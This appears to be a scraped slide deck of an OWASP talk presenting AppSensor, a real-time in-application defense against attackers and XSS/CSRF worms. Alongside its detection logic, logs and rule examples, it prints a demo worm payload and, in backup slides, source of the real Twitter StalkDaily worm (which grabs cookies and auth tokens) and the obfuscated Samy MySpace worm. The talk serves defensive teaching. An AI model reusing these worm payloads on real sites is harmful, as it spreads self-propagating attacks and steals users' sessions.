Download presentation
Presentation is loading. Please wait.
Published byJoseph Deman Modified over 9 years ago
1
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP EU09 Poland http://www.owasp.org Real Time Defenses against Application Worms and Malicious Attackers Michael Coates AppSensor Aspect Security Michael.Coates@aspectsecurity.com http://michael-coates.blogspot.com
2
OWASP Who am I? Michael Coates Michael.Coates@aspectsecurity.com Michael.Coates@aspectsecurity.com Senior Application Security Engineer @ Aspect Security Creator & Leader OWASP AppSensor Sporadic Security Blogger http://michael-coates.blogspot.com http://michael-coates.blogspot.com 2
3
OWASP Agenda Malicious Attackers Attacking online banks is easier Why we currently can’t catch them How to do it right Application Worms Why are they bad Detecting and preventing in real time Demo system w/ real worm 3
4
OWASP MALICIOUS ATTACKERS Real Time Defenses Against 4
5
OWASP Attack Detection: Real vs Cyber World Why do bank robbers get caught? Why don’t hackers get caught? 5
6
OWASP Robbing a Bank 6 Physical Controls Electronic Monitoring Human Monitoring Instant Detection and Response Controlled Access Multi Factor Auth Transaction Verification
7
OWASP Robbing an Online Bank 7 Alternate Admin Access Partial External Controls Ineffective Monitoring No Real Time Analysis Unnecessary Partner Trust No Response Capability Single Factor Auth Limited Security Training
8
OWASP Let’s change things! Applications should… Detect attacks Understand normal use vs. suspicious use Instantly identify attackers Shutdown attackers in real time Modify application accessibility for defense
9
OWASP But wait, we have log monitoring Log Monitoring Reactive process – “hey looks like we got hacked last week” Most logs are incomplete / missing critical data 9 1.2.3.4 - - [timestamp] "GET /banking/view/account.jsp?id=12345 HTTP/1.0" 200 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=12345 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=55112 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/account.jsp?id=55999 HTTP/1.0" 404 1.2.3.4 - - [timestamp] "GET /banking/view/account.jsp?id=12345 HTTP/1.0" 200 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=12345 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=55112 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/account.jsp?id=55999 HTTP/1.0" 404 176 [main] INFO examples.Sort - Populating data from db 272 [main] ERROR Access denied to /user/viewAcct.jsp 376 [main] ERROR User "Joe" performed unauthorized action 425 [main] DEBUG Admin page accessed 434 [main] INFO New admin account created 176 [main] INFO examples.Sort - Populating data from db 272 [main] ERROR Access denied to /user/viewAcct.jsp 376 [main] ERROR User "Joe" performed unauthorized action 425 [main] DEBUG Admin page accessed 434 [main] INFO New admin account created
10
OWASP What about a WAF? WAFs don’t understand application context Custom application + Generic Solution != success 10 WAF Application /viewAccount?id=1002 /viewAccount?id=1004 No attacks here, please proceed
11
OWASP Detecting Attacks the Right Way Detect INSIDE the Application Automatic Detection Comprehensive Minimize False Positives Understand Business Logic Immediate Response No Manual Efforts Required 11
12
OWASP Example Detection Point 12 String action = "viewAccount"; String targetID=Utility.safeGetParam("ID", request); if (authorized(action,targetID){ //perform action } else{ AppSensor.log (ACE1,user,request); throw new AccessControlException(); } String action = "viewAccount"; String targetID=Utility.safeGetParam("ID", request); if (authorized(action,targetID){ //perform action } else{ AppSensor.log (ACE1,user,request); throw new AccessControlException(); }
13
OWASP Detecting Malicious Users Receive POST for page which only expects GET Invoking unsupported/nonexistent HTTP Methods Change of User Agent midsession Transaction using functionality not visible to user role Double encoded data 13
14
OWASP Auth Why does this work? Simple Math x = # of attacks needed for AppSensor to determine user is malicious y = # of probes attacker needs to find a vuln if (x<y) { Application Wins / User Disabled } else { hello front page news story* } 14 Application
15
OWASP Detection Points Implementing AppSensor 15 Application Log Server AppSensor Brain Response Listener
16
OWASP APPLICATION WORMS Real Time Defenses Against 16
17
OWASP What about Application Worms? Twitter Worm Free advertising, job for creator Numerous copy cat worms MySpace Samy Worm Lots of friends for Samy …then MySpace goes down Huge damages for site: Remediation Cleanup Bad PR Infected Users Leverage XSS and CSRF 17
18
OWASP Detecting/Preventing an Application Worm Fix XSS vulns. That’s good. Miss any? Pattern matching easily foiled Common factor? Application leveraged by worm (updateProfile, updateStatus, updateName) XSS and CSRF for propagation 18
19
OWASP Case Study: Samy MySpace Application Worm XSS worm embedded in User Profile Added Samy as friend Infected viewer’s profile with XSS Exponential Growth of Samy’s friends 10 hours – 560 friends, 13 hours – 6400 friends, 18 hours – 1,000,000 friends, 19 hours – site down for repair
20
OWASP Samy vs AppSensor AppSensor detects uptick in addFriend usage Compares against trended info Automatic response initiated Alerts Admin +%200 Add Friend Usage Alerts Admin 2 nd time +%500 Add Friend Usage Automatically shuts down Add Friend Feature Result: Worm Contained, Add Friend Temporarily Disabled, Site Stays Up 200% alert 500% alert Auto Defense
21
OWASP Benefits of Trend Monitoring Detection of Application Worms, Scripted Attacks / Probing, CSRF Attacks Alerting of Excessive Activity Selective feature shutdown for overall stability
22
OWASP Seeing is Believing Demo Social Networking App Defended with AppSensor Trend Monitoring 22
23
OWASP The Design Demo App Embedded AppSensor Response AppSensor “Brain” App Logs
24
OWASP The Target 24 Poorly Validated Input Unencoded Output
25
OWASP The Exploit XSS infects victim’s “Status” with worm CSRF adds victim as friend of Charlie 25 The WORM var img=' '; document.write("I am a worm "+img); if(document.URL!='https://localhost:8443/AppSensorDemo/updateProfile.jsp'){ xmlHttp = new XMLHttpRequest(); xmlHttp.open("POST", "https://localhost:8443/AppSensorDemo/UpdateProfile", true); xmlHttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded; charset=UTF-8' ); var attackstr=' '; sdata="status="+attackstr+"&profile=wormed"; xmlHttp.send(sdata); xmlDoc=xmlHttp.responseText; } document.close(); The WORM var img=' '; document.write("I am a worm "+img); if(document.URL!='https://localhost:8443/AppSensorDemo/updateProfile.jsp'){ xmlHttp = new XMLHttpRequest(); xmlHttp.open("POST", "https://localhost:8443/AppSensorDemo/UpdateProfile", true); xmlHttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded; charset=UTF-8' ); var attackstr=' '; sdata="status="+attackstr+"&profile=wormed"; xmlHttp.send(sdata); xmlDoc=xmlHttp.responseText; } document.close();
26
OWASP Attack Set 26 Infected Status Worm Script Charlie is “patient zero” XSS to propagate CSRF to add friend
27
OWASP First Victim - “Molly” 27 Worm Fires
28
OWASP What Just Happened? 28 Message 24 Molly opens addFriends page Message 26 Worm tag adds Charlie as friend Message 27 Worm updates Molly’s status with malicious code Message 28 Redirection from successful profile update
29
OWASP Molly Infected 29 Worm Spreads CSRF Success
30
OWASP Friends Accumulate for Charlie! 30
31
OWASP Defend with AppSensor AppSensor Policy Notify Admin if events > 5 Disable Service if events > 10 AppSensor notices anomaly – alerts admin 31 Trend Alert: Trend greater than 5 - utilization=7 /AppSensorDemo/UpdateProfile ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/UpdateProfile Trend Alert: Trend greater than 5 - utilization=6 /AppSensorDemo/addFriend.jsp ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/addFriend.jsp Trend Alert: Trend greater than 5 - utilization=7 /AppSensorDemo/UpdateProfile ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/UpdateProfile Trend Alert: Trend greater than 5 - utilization=6 /AppSensorDemo/addFriend.jsp ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/addFriend.jsp
32
OWASP Defend with AppSensor Anomaly continues – disable service 32 Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/addFriend.jsp ResponseAction: Disabling Service Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/UpdateProfile ResponseAction: Disabling Service Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/addFriend.jsp ResponseAction: Disabling Service Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/UpdateProfile ResponseAction: Disabling Service
33
OWASP AppSensor Defends App 33 App Server Logs AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false AppSensorServiceController: Skipping Check for /AppSensorDemo/appsensor_locked.jsp AppSensorServiceController: Disable Service:/AppSensorDemo/updateProfile.jsp for 40 s AppSensorServiceController: service disabled, checking time App Server Logs AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false AppSensorServiceController: Skipping Check for /AppSensorDemo/appsensor_locked.jsp AppSensorServiceController: Disable Service:/AppSensorDemo/updateProfile.jsp for 40 s AppSensorServiceController: service disabled, checking time
34
OWASP Users are Protected from Worm 34 ----Validating Login of sue--- AppSensorServiceController: :/AppSensorDemo/friends.jsp active:true AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false Not Active, redirecting to locked page AppSensorServiceController: :/AppSensorDemo/UpdateProfile active:false Not Active, redirecting to locked page ----Validating Login of sue--- AppSensorServiceController: :/AppSensorDemo/friends.jsp active:true AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false Not Active, redirecting to locked page AppSensorServiceController: :/AppSensorDemo/UpdateProfile active:false Not Active, redirecting to locked page Worm Still Fires AppSensor protects Sue
35
OWASP Worm Contained, Site Stays Up 35
36
OWASP What’s Under the Hood? 36 Usage filter tracks feature usage isActive filter allows/denies feature access
37
OWASP What’s Under the Hood? 37 REST communication between AppSensor & App Support Response Actions: Warn user, logout user, disable user, etc Application Log Server AppSensor Brain Response Listener
38
OWASP AppSensor Brain Drools - Rule Based System Support for complex rule sets – much more than just counting feature usage Evaluates objects in Drools memory 38 rule "Trend Monitor 2" when $t2 : TrendMonitor(utilization > 10) then System.out.println("Trend Alert: >10 utilization="+$t2.getUtilization()+" "+ $t2.getResource()); org.owasp.AppSensor.ResponseAction.disableService($t2.getResource(),40,"s"); end
39
OWASP Future Plans for AppSensor Live Site of Demo App Attacker Detection Worm Detection Release of AppSensor Code Update to AppSensor Guide 39
40
OWASP Questions? michael.coates@aspectsecurity.com http://www.owasp.org/index.php/Category:OWASP_AppSensor_Project http://michael-coates.blogspot.com 40
41
OWASP Backup 41
42
OWASP Twitter Worm function XHConn() { var xmlhttp, bComplete = false; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp = false; }}} if (!xmlhttp) return null; this.connect = function(sURL, sMethod, sVars, fnDone) { if (!xmlhttp) return false; bComplete = false; sMethod = sMethod.toUpperCase(); try { if (sMethod == "GET") { xmlhttp.open(sMethod, sURL+"?"+sVars, true); sVars = ""; } else { xmlhttp.open(sMethod, sURL, true); xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1"); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); } xmlhttp.onreadystatechange = function(){ if (xmlhttp.readyState == 4 && !bComplete) { bComplete = true; fnDone(xmlhttp); }}; xmlhttp.send(sVars); } catch(z) { return false; } return true; }; return this; } 42 function urlencode( str ) { var histogram = {}, tmp_arr = []; var ret = str.toString(); var replacer = function(search, replace, str) { var tmp_arr = []; tmp_arr = str.split(search); return tmp_arr.join(replace); }; histogram["'"] = '%27'; histogram['('] = '%28'; histogram[')'] = '%29'; histogram['*'] = '%2A'; histogram['~'] = '%7E'; histogram['!'] = '%21'; histogram['%20'] = '+'; ret = encodeURIComponent(ret); for (search in histogram) { replace = histogram[search]; ret = replacer(search, replace, ret) } return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) { return "%"+m2.toUpperCase(); }); return ret; } var content = document.documentElement.innerHTML; userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g); var username = userreg.exec(content); username = username[1]; var cookie; cookie = urlencode(document.cookie); document.write(" "); function wait() { var content = document.documentElement.innerHTML; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g); var authtoken = authreg.exec(content); authtoken = authtoken[1]; //alert(authtoken); var randomUpdate=new Array(); randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?"; randomUpdate[1]="Join www.StalkDaily.com everyone!"; randomUpdate[2]="Woooo, www.StalkDaily.com :)"; randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!"; randomUpdate[4]="Wow...www.StalkDaily.com"; randomUpdate[5]="@twitter www.StalkDaily.com"; var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)]; updateEncode = urlencode(genRand); var xss = urlencode('http://www.stalkdaily.com"> <a '); var ajaxConn = new XHConn(); ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update"); var ajaxConn1 = new XHConn(); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update"); } setTimeout("wait()",3250);
43
OWASP MySpace Worm 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=- 1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form- urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoke n='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profil e.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2( '/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www- form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"> 43
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.